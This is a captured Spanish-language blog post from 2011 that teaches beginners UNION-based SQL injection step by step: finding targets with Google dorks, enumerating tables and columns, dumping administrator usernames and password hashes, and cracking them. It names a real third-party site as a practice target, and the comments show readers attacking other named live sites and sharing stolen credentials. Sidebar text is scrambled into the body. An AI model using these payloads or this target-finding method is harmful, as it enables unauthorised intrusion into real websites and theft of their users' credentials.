Tutorial de Inyección SQL para Principiantes - # Root-Net - Seguridad, Software, Windows, e Informatica.

13/2/2014
Tutorial de Inyeccin SQL para principiantes | # Root-Net | Seguridad, Software, Windows, e Informatica..
LOL
Pgina principal
Scams
Desings (Photos
Rss
hop)
Tutorial de Inyeccin SQL para principiantes
sbado, 23 de julio de 2011
Publicado por OverNet en sbado, julio 23, 2011 ,
Primero y antes que nada, debemos saber muy bien los conceptos de cada uno que tocaremos en e
ste tema.
Search...
Labels
2wire (3)
Aplicaciones (11)
bugs (8)
correo (1)
Defacing (12)
diseo grafico (1)
Epic Fail (1)
facebook (2)
Firefox (5)
gmail (1)
Hacking tools (9)
SQL Injection - Tutorial by OverNET
hardware (1)
hotmail (2)
Qu es SQL?
htaccess (1)
Significa un Lenguaje de Consulta Estructurado (en ingles Structured Query Languaje). Como su no
Humor (1)
mbre lo indica es un lenguaje para tener acceso a una Base de Datos que nos permite realizar varias o
Infografia (1)
peraciones en ella, como poder guardar informacin privada de un sitio web, contraseas, nombres, y
Internet (26)
otras cosas.
IP (5)
Java (3)
Sin embargo, muchos CMS Sistema de Gestin de Contenidos (en ingles Content Management Syste
Java script (2)
m) utilizan SQL para acceder a una Base de Datos (PhpMyAdmin) y guardar informacin.
localhost (5)
Mexico (3)
CMS (Sistema de Gestin de Contenidos) no es ningn tipo de programa literalmente, sin embargo, es
programado para que los usuarios tengan la facilidad de crear su pagina web utilizando una base de d
atos.
Algunos CMS son muy populares como lo son; SMF, Wordpress, y Blogger entre otros.
Y qu significa SQLi?
Musica (1)
Papers (1)
Phishing (1)
Photoshop (1)
PHP (17)
SCAM (3)
Seguridad (9)
Son la abreviatura de SQL Injection. Aunque, SQLi es un bug bastante viejo, existen CMS o pginas we
Shell (2)
b con esta vulnerabilidad.
Software (6)
Temas (1)
Deb ido que es un post para principiantes y un poco largo, no ir muy a fondo sob re los conceptos, por e
Tutoriales (7)
so mejor aqu la dejamos y vamos al tutorial.
Velocidad (1)
Videos (1)
Donde puedo encontrar paginas vulnerables a SQLi?
Windows (9)
En Google, sin embargo, existen Dorks (Palabras claves para poder encontrar CMS vulnerables con fac
Windows 7 (6)
ilidad). De cualquier manera no es muy difcil encontrar sitios (Prob ab lemente) vulnerables a SQLi.
Windows live messenger (3)

Wordpress (1)
Pginas vistas en total
460,412
http://root-network.blogspot.com/2011/07/tutorial-de-inyeccion-sql-para.html
1/16
13/2/2014
Post ms Populares
Logotipo de Google
Solo es cuestin de ingeniarse las palabras claves para encontrar sitios Web con este bug.
No entendiste? La Inyeccin SQL se empieza por encontrar en una url muy parecido a esto: /index.ph
p?id=28, sin embargo, la inyeccin se comienza en la variable id=28.
Tutorial Inyeccin SQL para principiantes

Primera fase
Un ejemplo de como buscar en Google
1) Nos dirigimos a la pagina de Google y en el buscador colocamos esto id = cat index.php?
Nota: Actualmente Google ha actualizado su buscador, ha mejorado sus herramientas, y la interfaz g
rafica.
Abrir puertos en mde

m 2Wire; 2701HG-T (T
Tutorial de Inyeccin S
elmex - Mxico)
QL para principiantes
Calcular la raiz cuadra
da - Java en Netbeans
[Tutorial] Crear cualqui
(Bsico)
er SCAM (Fake login) e
Como compilar Java d
n PHP con Dreamweav
esde la consola de Wi
Cambiar
la direccin M
er
ndows
AC Address en Windo
Conectarse a WLM con
ws 7
una cuenta Gmail
Simple PHP Obfuscato
r
Evitar XSS/Html Injectio
n en formularios [PHP]
Freemake Video Down
Bsico
loader - Descargar vid
eos HD de cualquier si
Cantidad de lectores en linea
tio
Sin embargo, obtendremos tal resultado como la imagen:
Shout Box
11 f eb 14, 09:56
Money ATM: Magic Formula to earn

online! http://adf.ly/bk7MX
9 f eb 14, 04:23
Jun: jom ke blog saya pulak, byk tips

utk lebih sihat
1 f eb 14, 10:16
Charles: Softw are autoblogw alking

30 ene 14, 01:43
Hai Blogger: [b]Hi, There very good

look and love you blog :) visit me too..
[/b]
28 ene 14, 12:58
Lily: Baru lancar !! formula buat duit

RM10 - RM100 sehari..
Google 2011-Junio: Buscador
17 ene 14, 12:31
Oloroko: Actualizando..
[mensajes antiguos]
2) Tambin podemos utilizar la barra lateral Izquierda para encontrar ms sitios vulnerables.
[Sw itchnode]
actualizar
nombre
mensaje
ok
ayuda emoticonos cbox
Canal de Youtube
Donde nos visitas
Barra lateral de Google Search 2011
Como saber si la pgina es vulnerable?

Bastante sencillo, tan solo colocar una ' (Comillas, coma, punto, cualquier caracter) al final de la variabl
e es decir /index.php?id=28' nos deber marcar un error ms o menos as (Puede variar los errores, p
ero el ms comn entre ellos es este):
You have an error in your SQL syntax; check the manual that corresponds to your MyS
QL server version for the right syntax to use near ''' at line 1
2/16
13/2/2014
S de lo contrario no muestra error, quizs el sitio no sea vulnerable.. (Pero no significa que no sea vu
Live Traffic Feed
lnerable a SQLi).
Como? Osea es vulnerable o no?
Djame explicarlo, muchos administradores no tienen idea lo fcil que es arreglar este bug (SQLi) en s
u pagina web, lo que ellos hacen es unicamente agregar una funcin en PHP para evitar que se muest
ren los errores de la web es un error muy grave que cometen los webmaster, ni ms ni menos, este e
s el sencillo cdigo PHP que utilizan:
<?php error_reporting(0); ?>
Cabe mencionar que es un error muy comn por parte de los administradores, ya que eso no arregla el
bug, sin embargo, el bug sigue all.. Es un problema para la seguridad de su sitio, ya que el atacante p
odr darse cuenta y seguir intentando hasta tener el usuario y contrasea de la administracin fcilmen
te.
Explicacin resumida:
Tenemos la siguiente pgina como ejemplo http://www.asfasd.com/index.php?cat=45
Agregamos una comilla al final de la url http://www.asfasd.com/index.php?cat=45'
Nos muestra el siguiente error You have an error in your SQL syntax; check the manual th
at corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Explotando el Bug
Segunda fase
Viene la parte un poco ms tediosa.
A visitor from Montevideo,

Uruguay viewed Tutorial de
Inyeccin SQL para
principia...
1 min
ago
A
visitor from
Medelln,
Antioquia viewed "Tutorial de
Inyeccin SQL para
principiantes | # Root-Net |
Seguridad,
Software,
A
visitor from
Mexico,Windows,
Distrito
e Informatica.."
8 minslaago
Federal
left "Calcular
raiz
cuadrada - Java en Netbeans
(Bsico) | # Root-Net |
Seguridad, Software, Windows,
A
visitor from Mexico
e Informatica.."
via viewed
"Tutorial
de
Inyeccin
4.bp.blogspot.com 10 SQL
mins ago
para principiantes | # Root-Net |
A
visitor from Mexico,
e Informatica.."
10 minsDistrito
ago
Federal viewed "Calcular la raiz
cuadrada - Java en Netbeans
(Bsico) | # Root-Net |
A
visitor from Mexico,
e Informatica.."
11 minsDistrito
ago
Federal viewed "Cambiar la
Real-time view Menu
Pero antes de llegar a esta parte necesitamos entender dos conceptos:

UNION se usa para combinar el resultado de un nmero de comandos
SELECT en un conjunto de resultados.
Fuente | http://dev.mysql.com/doc/refman/5.0/es/union.html
Informacin..
Avatar 2011
Ahora ya habamos visto que nos lanzo un error anteriormente y que si era vulnerable, ahora es tiempo
de buscar hasta encontrar la columna vulnerable.
Un ejemplo sencillo de como empezar la inyeccin tenemos lo siguiente /index.php?cat=45 ahora ant
es de la variable (45) y despus del signo (=) agregaremos el signo de menos (-) deber quedar as:
/articulo.php?articulo=-230 y agregamos el union y select y empezamos a partir del
numero 1 o el numero 0.
/articulo.php?articulo=-230+union+select+1-- (Muy importante poner los dos ltimo
s guiones).
"..Cuanto ms sab es, ms te das cuenta

de que no sab es nada."
Scrates
/articulo.php?articulo=-230+union+select+1,2,3-- (Es importante poner la coma entr

e cada numero)
Creative Commons License
Seguiremos as, hasta que no nos vuelva salir error como el anterior
Como sabre si el numero de la columna es vulnerable?
Al momento que veas uno o ms nmeros en la web y que no haya un error quiere decir que le hemos
dado a la columna vulnerable, un ejemplo real:
3/16
13/2/2014
Columnas vulnerables
Lo que esta marcado en recuadro esos nmeros no son errores, y en la barra de direcciones esta la
semi-inyeccin.
En resumen los nmeros marca que podemos concluir la inyeccin en este caso me ir sobre el nume
ro 2 (color azul).
Hay que tener en cuenta tambin, la versin de la base de datos si es 5.*.* - comunity se podrn sacar
los nombres de las tablas y columnas, si de lo contrario es inferior a la versin 5, es decir versin 4 no
se podr extraer los nombres de las tablas y/o columnas, se tiene que hacer a ciegas y es un poco tedi
oso.
Para saber la versin de la base de datos (SQL) solo agregamos al final de union+select+1,2,3,4,5 dat
abase()
Tercera fase
Sacando nombre de las Tablas
Desde la barra de direcciones remplazamos el numero 2 por group_concat(table_name) debe quedar
algo as:
/articulo.php?articulo=-230+union+select+1,group_concat(table_name),3,4,5+from+
information_schema.tables-Tambin es importante agregar el +from+information_schema.tables-- al final, despus ingresamos
esa url y nos da como resultado todos los nombres de las tablas que existen en la Base de dados.
Ejemplo real:
Nombre de las Tablas (Incompleta)
Nota | Como se ve en la imagen, tenemos como resultado los nombres de las tablas. Pero hay un peq
ueo problema, el tamao de la pgina nos limita a que solo veamos una cierta cantidad de numero de
tablas (Por naturaleza).
Sin embargo, no hay nada que nos impida, pues gracias a una funcin de SQL podemos utilizar otra a
lternativa, en este caso ser la opcin limit que nos permitir limitar el rango de registro, y as poder ac
ceder a la tabla del administrador o la de usuarios.
En este caso hay que hacer lo siguiente, quitamos group_concat() y solo dejamos table_name y al fina
l de information_schema.tables agregamos +limit+1,1-- as quedar la url:
/articulo.php?articulo=-230+union+select+1,table_name,3,4,5+from+information_sc
hema.tables+limit+1,1-Lo cul nos mostrar el nombre de la primer tabla, es decir, tendremos que buscar la tabla en donde s
e encuentra la del admin o la de usuarios
Nota | Puedes seguir utilizando la misma serie de 10 en 10 para que sea ms rpido de encontrar la ta
4/16
13/2/2014
bla de usuarios, ya que esta en orden alfabtico de la a - z.

Un ejemplo sencillo:
/articulo.php?articulo=-230+union+select+1,table_name,3,4,5+from+information_sch
ema.tables+limit+10,1-La tabla es KEY_COLUMN_USAGE (No es la que buscamos)
Seguimos aumentando de 10 en 10:
ema.tables+limit+20,1-La tabla es SESSION_VARIABLES (No es la que buscamos)
Seguimos intentado..
ema.tables+limit+30,1--,1-La tabla es cotizaciones (No es la que buscamos, pero estamos un poco cerca..)
Y as, hasta dar con el nombre de la tabla uno que diga: admin, administrador, usuarios, users, usuari
s, etc.. (Puede variar los nombres de las tablas y columnas por el idioma)
ema.tables+limit+38,1-La tabla es admin ( Bingo, es la que buscamos !!)
Una ves que tengamos el nombre de la tabla que queremos y es en este caso admin vamos a convertir
la en ASCII les dejo la herramienta online para el conversor de String a ASCII | http://easycalculation.co
m/ascii-hex.php
admin = 97 100 109 105 110
Como ven, la cadena admin esta en ASCII.
Extraccin de columnas de la tabla

Cuarta fase
Ahora modificamos nuestra url algo que quede as (incluyendo admin, pero convertida en ASCII):
Nota | Lo marcado en negritas es lo que modifico la url anterior.
/articulo.php?articulo=-230+union+select+1,group_concat(column_name),3,4,5+fro
m+information_schema.columns+where+table_name=char(97,100,109,105,110)-Como resultado nos tendr que imprimir los nombres de las columnas, por ejemplo:
email, contrasena, usuario, pwd
Un ejemplo real es este:
Extraccin de columnas
Otra alternativa pero utilizando la misma opcin es utilizando el limit lo cul solo nos imprimir el rango
de la columna que le indiquemos.
Ejemplo:
5/16
13/2/2014
/articulo.php?articulo=-230+union+select+1,column_name,3,4,5+from+information_
schema.columns+where+table_name=char(97,100,109,105,110)+limit+0,1--
Extraccin de usuario y contrasea

Quinta fase
Esta parte es la ms fcil, ya que lo anterior era lo complicado. Supongamos que ya sabemos los nom
bres de la tabla en este caso es admin y las columnas que nos interesan son usuario y pwd (contrase
a), ahora hay que extraer los datos de esas dos columnas y para eso hacemos lo siguiente.:
Nota | Recuerda que lo remarcado en negritas es lo que cambia la url anterior.
/articulo.php?articulo=-230+union+select+1,group_concat(usuario,0x3a,pwd),3,4,5+
from+admin-Con esa simple inyeccin nos mostrar el usuario y contrasea de la administracin.
SQL Injection
: = 0x3a (Hexadecimal)
usuario = Columna
pwd = Columna
admin = Tabla
La contrasea esta encriptada en MD5 Hash

Es lo peor que viene en este caso al no poder ver la contrasea real cuando esta encriptada en MD5 Ha
sh.
Pero gracias a que existen herramientas y diccionarios para crackear MD5 las contraseas se pueden
desencriptar.
Pero hay que tener muy en cuenta que no todos los Hash son MD5 puede variar el tipo de Hash por la s
eguridad del CMS, hay contraseas encriptadas en SHA-1, MD4, Base64, etc.. Son muy diferentes al M
D5.
Pero les dejo una lista para que puedan diferenciar el tipo de Hash | http://www.insidepro.com/hashes.
php tambin una herramienta en PHP para crackear Hash MD5 Online, tienen que subirlo a un FTP.
Herramienta crack MD5 Hash online mult.
No encuentro el login o la administracin de la pgina?

Por suerte tambin existen herramientas para poder encontrar el path en la que se encuentre el login d
e la administracin, ac les dejo uno codeado por neutralised | Admin Panel Finder PHP.
Pagina para practicar

Como se pudieron dar cuenta, este tutorial me gui en una pagina vulnerable y esa pagina es esta:
http://www.ancvm.com/articulo.php?articulo=-230
Administracin de la pagina, la administracin de la web esta en este path
http://www.ancvm.com/admin/login.php
NOTA | Recuerden que esta pagina puede que por el tiempo no sea vulnerable a este tipo de Inyecci
n, tambin no abusen de los datos del administrador ni anden jodiendo la web, este tutorial es de u
6/16
13/2/2014
so educativo y el administrador de este blog no se hace responsable de lo que el usuario pudiera ha

cer con esta informacin.
Fin del Tutorial

Este tutorial fue creado por OverNET, si tienen dudas o sugerencias pueden escribirlas en este mis
mo post.
Etiquetas: bugs , Defacing , Internet , Seguridad , Tutoriales
ack To
p
+1 Recomendar esto en Google
71
COMENTARIOS :
Este comentario ha sido eliminado por un administrador del blog.

Annimo at mircoles, agosto 03, 2011 10:25:00 p. m.
amigo que buen tuto, pero tengo un problemilla cuando estoy en la fase de agre
gar el union con el 1 2 3 etc, me sale el sieguiente error
Not Acceptable
An appropriate representation of the requested resource /detalleoracion.php cou
ld not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an Error
Document to handle the request.
que puedo hacer???

Annimo at mircoles, agosto 03, 2011 10:26:00 p. m.
Es porque el administrador del sitio tiene habilitado el "mod_security" en la conf
iguracin del php.ini..
Es por eso que te da Error 406..
Hay una forma de bypassear el filtro de seguridad, pero es un poco complicado.
Para ms info leer | http://seguridadblanca.blogspot.com/2011/07/bypass-mods
ecurity-asp.html
OverNet at mircoles, agosto 03, 2011 10:40:00 p. m.
Gracias compradre, seguire en la lucha, mil gracias
Annimo at jueves, agosto 04, 2011 7:10:00 p. m.
amigo, que pena molestarte tanto, pero aqui estoy de nuevo y me sale el siguie
nte error
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result res
ource in /home/shrikant/public_html/link_navi.php on line 11
sigo con el orden de inyeccion pero no cambia nada ni imprime la info de las ta
blas ni nada
e buscado info sobre este error y no sale nada que pueda ayudarme, si eres tan
amable y si no es mucha molestia y ayudarme
Annimo at lunes, agosto 08, 2011 3:25:00 p. m.
He googleado y medio a la pagina de 'Safety Electronics for motocycles' si es as
7/16
13/2/2014
, yo si pude imprimir los nombres de las tablas..
A m me imprime la info hasta el numero '11' es decir:
/index.php?cat_id=-1,2,3,4,5,6,7,8,9,10,11-El numero vulnerable es el '1' lo puedes comprobar:
1+union+select+concat(database(),0x3a,version()),2,3,4,5,6,7,8,10,11-Te deber imprimir el nombre y la versin de la DB.. xD
Y all debers seguir hasta poder encontrar los nombres de las tablas hasta col
umnas..
Saludos, escribe cualquier duda q tengas
OverNet at lunes, agosto 08, 2011 4:12:00 p. m.
muy buen tuto en verdad me sorprendio, tengo una duda, podemos obtener o d
escargar toda una base cin este metodo? gracias
omega96 at jueves, agosto 25, 2011 11:40:00 p. m.
La verdad no conozco alguna forma de como poder descargar la Base de datos
*.sql si es a lo que te refieres.
Si te refieres poder imprimirlas existen herramientas que te permiten hacerlo, al
gunas estan en PHP cuando tenga tiempo las poste.
Existen herramientas para novatos, que incluyen la funcin para visualizar y pod
er guardar la Base de datos, el SQLi Helper y Havij.
Saludos
OverNet at viernes, agosto 26, 2011 3:05:00 p. m.
Muy buen post!
Muchas gracias amigo por compartir tu sabiduria con los demas!
ras3Ath0r at domingo, agosto 28, 2011 6:14:00 a. m.
Amigo muy bueno el post y muy util , tengo un problema al llegar al paso de extr
accion de usuario y contrasea. pongo al final from+usuario-- (en mi caso en la
pagina en la que estoy es usuario) y me salta el siguiente error: Error: SELECT *
FROM noticia WHERE id = -55 union select 1,group_concat(usuario,0x3a,pwd),3
,4,5,6,7,8,9 from usuario-- LIMIT 1
Unknown column 'usuario' in 'field list'
alguna idea?
dario! at mircoles, agosto 31, 2011 9:08:00 p. m.
El error que muestra es este:
Unknown column 'usuario' in 'field list'
Quizs no acepte 'group_concat()' intenta unicamente usando concat() es decir:
-55+union+select+1,concat(usuario,0x3a,pwd),3,4,5,6,7,8,9+from+usuario-si de lo contrario no funciona, intenta quitar el concat y hacer lo siguiente;
Columna usuario:
-55+union+select+1,usuario,3,4,5,6,7,8,9+from+usuario-Columna pwd:
-55+union+select+1,pwd,3,4,5,6,7,8,9+from+usuario-Si vuelve a salir el mismo error, quizas esten vacias las columnas o no existen.
OverNet at mircoles, agosto 31, 2011 9:48:00 p. m.
A mi al mirar los nombres de las columnas me aparece esto : Illegal mix of colla
tions for operation 'UNION'Que significa? Saludos!
8/16
13/2/2014
|\/|3L0C070|\| at mircoles, septiembre 07, 2011 1:17:00 p. m.

Significa que hay errores de caracteres, puede que no este escrito bien el nomb
re de las tablas o columnas en ASCII..
Tambin sal cuando no es vulnerable la web.
OverNet at jueves, septiembre 08, 2011 4:17:00 p. m.
MMM yo ago todo lo que sies pero cuando llego asta el numero 5 osea 1,2,3,4,5
-- no me sale nada me tira el mismo error de siempre a que se deve esto? s;
Annimo at martes, diciembre 06, 2011 1:23:00 a. m.
Yo lo intente en la web page que pusiste y no me sale nada ni errores no se por
que sera
Annimo at mircoles, diciembre 28, 2011 12:00:00 p. m.
Lo siento, pero supongo que han arreglado el sitio web.
De cualquier manera, quizas agregue ms sitios vulnerables para que todos pu
edan practicar.
Saludos
OverNet at mircoles, diciembre 28, 2011 5:19:00 p. m.
puedo sacar el admin y la pass, me queda algo como Categoria admin:pass (o
bviamente no son esos los nombres reales del admin y la pass) pero cuando
meto en el login (el mismo que usan los usuarios, quizas es por eso) los datos
de admin y password me dice que no existe tal usuario. quiza hice algo mal (es
otra pagina la que "hackee" no la que vos proporcionaste). muchas gracias des
de ya
Annimo at martes, enero 17, 2012 1:55:00 p. m.
encontre el login del admin, pero igual sigue dando erroneo, pese a haber hech
o todos los pasos bien e incluso obtengo como resultado Categoria samir:fjohn
son pero no se cual es el admin y cual la pw. (soy el mismo que comento arriba
)
Depende como sea el login del admin, aveces confundimos el cpanel,la del ftp,
con la de la web. (Comprueba si existen ms logins)
Si haz manejado comnmente estas columnas (user,0x3a,pass) con la tabla us
uario o user es probable que el usuario sea samir y la contrasea sea fjohnson
, tambin debes revisar si existe una tabla con el nombre admin, administrador,
administrator, etc..
y columnas en esa tabla.
Nota*
Quizs la que encontraste no es la del administrador si no del usuario.
OverNet at martes, enero 17, 2012 3:37:00 p. m.
gracias, resulta que solo puedo obtener la password del admin (fjohnson) pero
no el nombre del admin (la cuenta). ahora estoy usando SQLi Helper 2.7 que fa
cilita toda la tarea (la automatiza). no se si lo conoces, pero hice en pocos segu
ndos lo que me tomo casi horas con este tutorial. te lo recomiendo :)
La conozco, pero el tutorial tiene como propsito unicamente aprendizaje y educ
9/16
13/2/2014
ativo.
Una herramienta automatizada para principiantes nunca te dir el porque de las
cosas.
Saludos
si alguna vez lo usaste, sabrias decirme porque solo funciona 1 vez y luego deja
de funcionar, o funciona cuando quiere? :S
No tengo idea, es posible que tenga errores anti-script kiddies
Hola, obtuve una contrasea asi 414caf51f461495d4a8c4561c8c1f0b4:Oa
y no la puedo desencriptar (no es MD5 me parece, fijate que tiene ":") no se com
o desencriptarla, me podrias ayudar?
Annimo at mircoles, enero 18, 2012 11:50:00 a. m.
No tengo idea, de que tipo de hash es.
OverNet at mircoles, enero 18, 2012 1:37:00 p. m.
gracias eres un ejemplo de grandesa tio y a ese q prefiere el automatizado esta
muy equivocado porq si a 15 min lo que hace el helper y eso q llevo un tiempo u
sandolo bueno mil gracias hermano q dios te bendiga a seguir a asi suerteeee
Annimo at viernes, enero 20, 2012 4:28:00 a. m.
Se agradece.
Saludos
OverNet at viernes, enero 20, 2012 12:11:00 p. m.
oye amigo solo con una duda que significa el "230" que se coloca antes del sig
no "-" este numero puede variar?
Melestu at lunes, enero 23, 2012 12:30:00 a. m.
@Malestu, el '230' es unicamente la variable de la noticia, es decir, puedes emp
ezar la inyeccin con cualquier numero no altera en la inyeccin.
OverNet at lunes, enero 23, 2012 2:01:00 p. m.
Una herramienta automatizada para principiantes nunca te dir el porque de las
cosas.
mensajes claro at jueves, marzo 01, 2012 2:13:00 p. m.
Amigo que buen tuto !
enviar mensajes claro at viernes, marzo 16, 2012 11:55:00 a. m.
muy buenoo
Annimo at viernes, abril 13, 2012 1:41:00 p. m.
lo que si me ayudaran miren vereis no tengo mucha idea de esto pero intente c
on una web y me da error 404 y dice php 2.2 y apache 5.2.6 nose si eso se podri
a inyectar o si es vulnearable al sql no lo se pregunto muchas gracias si me pu
10/16
13/2/2014
dieran responder mi name es sarah gracias
Annimo at viernes, abril 13, 2012 1:42:00 p. m.
El error 404 es un filtro de seguridad.
Y no es vulnerable.
OverNet at viernes, abril 13, 2012 2:06:00 p. m.
oye que sabes de varchar sqli??
Annimo at domingo, julio 01, 2012 12:27:00 a. m.
Llego a ahi y no pasa nada mas , ayuda
http://www.ranchworldads.com/index.php?cat_id=-4+union+select+1-Annimo at mircoles, agosto 01, 2012 3:40:00 p. m.

yo lo logre acedi a la clave pero me sale esto
horaciod:administra,elena:rocio
y cuando lo pongo en administrador no entra se puede por medio de la url o hay
q todavia hacer algo mas y es correcto q me salga esos cuatro nombres
Annimo at domingo, agosto 05, 2012 12:22:00 a. m.
a me olvidava cuando meto los terminos me sale esto
[Fallo en la conexion con la base de datos] ( 2005 : Unknown MySQL server host
'DB_HOST' (1) )
Annimo at domingo, agosto 05, 2012 12:25:00 a. m.
Si ya encontraste las passwords y no estn encriptadas, tendras que buscar el
login o administracin. En tu caso el error se debe que no tiene conexin con la
BD, intenta o busca otro login, aveces tienen diferentes logins, uno esta escondi
do.
Utiliza un Admin Panel Finder
OverNet at domingo, agosto 05, 2012 10:19:00 a. m.
ok gracias por la ayuda
Annimo at martes, agosto 07, 2012 10:51:00 p. m.
Hacked
Annimo at martes, septiembre 04, 2012 6:34:00 a. m.
Ok. Muy buen tutorial. Y va la pregunta del milln de euros que implementar par
a que no nos pase esto de ser vulnerable?
Annimo at martes, octubre 16, 2012 10:15:00 a. m.
Buena pregunta este fin de semana voy hacer un tutorial de como reparar el bug
.
Y la nica forma es arreglar el cdigo desde el mismo archivo.
De cualquier manera te paso un link donde explica como arreglar, si no se entie
nde este fin voy hacer un tutorial.
11/16
13/2/2014
http://www.ribosomatic.com/articulos/como-evitar-sql-injection-en-nuestra-cons
ultas-phpmysql/
OverNet at martes, octubre 16, 2012 10:37:00 a. m.
mi pregunta es.. se puede tambien inyectar a paginas que no son desarrollada
s en php..es decir se podr en una ASP???
Annimo at mircoles, octubre 24, 2012 7:24:00 p. m.
Con este metodo no se puede, ya que es para PHP y de los archivos .php es do
nde esta el bug explotable.
En ASP si se puede hacer inyeccin pero es un poco ms dificil.
OverNet at mircoles, octubre 24, 2012 9:06:00 p. m.
oye amigo me estanque en el paso de string to ASCII, cuando la quiero convertir
a ASCII me da el codigo, pero cuando pongo el codigo asi: -230+union+select+
1,group_concat(column_name),3+from+information_schema.columns+where+t
able_name=char(85 83 69 82 95 80 82 73 86 73 76 69 71 69 83)-se supone que debe mostrar las claves y usuarios pero me manda este error: Y
ou have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '83 69 82 95 80 82 73 86 73
76 69 71 69 83)--' at line 1
que puedo hacer??
Annimo at martes, octubre 30, 2012 10:00:00 p. m.
Estas bien solo quitale los espacios y pones coma.
As:
-230+union+select+1,group_concat(column_name),3+from+information_schem
a.columns+where+table_name=char(85,83,69,82,95,80,82,73,86,73 76,69,71,6
9,83)-Intenta con eso.
OverNet at martes, octubre 30, 2012 10:30:00 p. m.
aaaaa ya entedi, gracias por resolverme mi duda
Annimo at mircoles, octubre 31, 2012 3:47:00 p. m.
oye cuando empiezo la inyeccin me aparece esto Warning: mysql_fetch_array()
: supplied argument is not a valid MySQL result resource in /home/content/a/k/a/
akanet/html/prod_detail.php on line 144
y por mas que continu la inyeccin sigue apareciendo el mismo mensaje osea
no cambia, que puedo hacer?
Annimo at viernes, noviembre 02, 2012 10:51:00 p. m.

oye amigo cuando le pongo la comilla no pasa nada, pero cuando quiero busca
r las tablas me dice esto: No est autorizado para ver este recurso Necesita con
ectarse.
significa que no es vulnerable o existe otro mtodo para hacerle la inyeccin
-230+union+select+1,group_concat(column_name),3+from+information_schem
a.columns+where+table_name=char(85,83,69,82,95,80,82,73,86,73,76,69,71,6
9,83)--
12/16
13/2/2014
Asunto arreglado falto ponerle una coma.
OverNet at viernes, noviembre 02, 2012 11:59:00 p. m.

se puede hackear este tipo de sitios:
index.php?option=com_content&task=view&id=345&Itemid=265
es que cuando le pongo la comilla no pasa nada, y cuando sigo con el siguient
e paso(-230+union+select+1--) me sale un error que dice:
no esta autorizado para ver esta informacion, necesita conectarse.
hay otro metodo?
o no es vulnerable?
No creo que sea vulnerable, el cms es joomla y en algunas versiones antiguas
si son vulnerables a SQLi. Pero en tu caso, no es vulnerable.
OverNet at viernes, noviembre 09, 2012 10:44:00 p. m.
Buen articulo lo explicas todo pero tengo un problema, al intentar sacar el usuar
io y la password del final, la pagina no me muestra la password completa es de
cir muestra el usuario y la pass: group_concat(usuario,0x3a,password) pero la
pagina tiene una fuente muy grande y se limita a mostrarla toda, as que me po
dras decir que funcin se emplea aqu? :) Salu2
Max_Hcz_Julieinstein at martes, noviembre 20, 2012 5:29:00 p. m.
Muy Bueno el paso a paso, muchas gracias.
Novato at lunes, diciembre 10, 2012 7:13:00 a. m.
que significa el -203 ?
dgs crew at jueves, diciembre 13, 2012 4:23:00 p. m.
El '-203' el '-' es para dar inicio la inyeccin, el '203' es el id de la noticia (Esto no
importa, puede ser el 0,1,2,3.. el numero que quieras no afecta en nada en la in
yeccin)
OverNet at jueves, diciembre 13, 2012 6:58:00 p. m.
Hola ,
Cuando pongo el apostrofe me sale lo siguiente :
Query: SELECT id,catname,password FROM rp_categories WHERE id='1''
Result: You have an error in your SQL syntax; check the manual that correspond
s to your MySQL server version for the right syntax to use near ''1''' at line 1
Database handle: Resource id #6
Y seguidamente pongo en la URL la sentencia que indicas por que como veras
ya tengo el nombre de la tabla y sus columnas , pero solo me redirecciona a la
pagina inicial.
Qu puede ser?
Annimo at mircoles, enero 09, 2013 3:59:00 p. m.
Desactiva Java Script de tu navegador, e intenta.
13/16
13/2/2014
OverNet at mircoles, enero 09, 2013 9:39:00 p. m.
wowwww you're a genius!!! como aprendiste todo eso!!!? cuanto tiempo tardaste
en aprendertelo?
Annimo, no se necesita aprenderse nada.
Por inercia es necesario saber estos temas para quien est interesado en prog
ramar su propio sitio en PHP y MySQL de all se empieza, programando.
Everyone loves it when people come together and
share opinions. Great blog, stick with it!
Also visit my web-site :: youtube software views
Annimo at lunes, abril 08, 2013 12:38:00 p. m.

This is the right site for anyone who really wants to find
out about this topic. You realize so much its almost tough
to argue with you (not that I personally will need toHaHa).
You definitely put a brand new spin on a subject that
has been discussed for ages. Excellent stuff, just wonderful!
Here is my blog; Boost Adfly Earnings Tool

Annimo at martes, abril 09, 2013 8:18:00 a. m.
Thank you for the good writeup. It in reality used to be a amusement account
it. Look complex to more delivered agreeable from you!
By the way, how can we keep in touch?
My web site ... play minecraft free
Annimo at domingo, abril 14, 2013 2:16:00 a. m.
Great beat ! I would like to apprentice while you amend your
site, how can i subscribe for a blog site? The account helped me a acceptable d
eal.
I had been a little bit acquainted of this your broadcast provided
bright clear idea
My blog post; play minecraft free
Annimo at mircoles, abril 17, 2013 8:45:00 a. m.
I like the helpful information you provide on your articles.
I'll bookmark your blog and take a look at again here frequently. I am somewhat
sure I'll learn many new stuff right
right here! Good luck for the next!
Also visit my webpage :: dragonvale the Game
Annimo at mircoles, abril 17, 2013 2:46:00 p. m.
I like looking through an article that can make men and women think.
Also, thank you for permitting me to comment!
Look into my page - funny facebook status
14/16
13/2/2014
Annimo at jueves, abril 18, 2013 6:05:00 a. m.
hola gran tutorial mi pregunta es se puede sacar user y pass de una pagina qu
e termine en index.php
Saludos
Annimo at jueves, abril 25, 2013 1:22:00 a. m.
My brother recommended I might like this web site. He was totally right.
This post actually made my day. You cann't imagine simply how much time I had
spent for this info! Thanks!
My homepage :: cityville
Annimo at domingo, junio 16, 2013 10:19:00 a. m.
When someone writes an paragraph he/she retains the image
of a user in his/her brain that how a user can know it. Therefore that's why this po
st is perfect. Thanks!
Also visit my web page ... download cityville
Annimo at lunes, junio 17, 2013 6:39:00 a. m.
Saved as a favorite, I like your blog!
Here is my web page ... cheats in dragonvale
Annimo at martes, junio 18, 2013 12:29:00 p. m.
PUBLICAR UN COMENTARIO
EN LA ENTRADA
Blaaa blaa y + blaa.. escribe las dudas que tengas :D

- No incluyas Correos electrnicos por seguridad propia.
- No SPAM/Flood.
- Se borrar cualquier comentario ofensivo, racista o vulgar.
Introduce tu comentario...
Comentar como:
Publicar
Cuenta de Google
Vista previa
Enlaces a esta entrada

Crear un enlace
Entrada ms reciente
Pgina principal
Entrada antigua
2014 # Root-Net | Seguridad, Software, Windows, e Informatica... Powered by Blogger.

Designed by Xu.hel, Blogger templates by Blog and Web
15/16
13/2/2014
16/16

Tutorial de Inyección SQL para Principiantes - # Root-Net - Seguridad, Software, Windows, e Informatica.

Uploaded by

Document Information

Original Title

Copyright

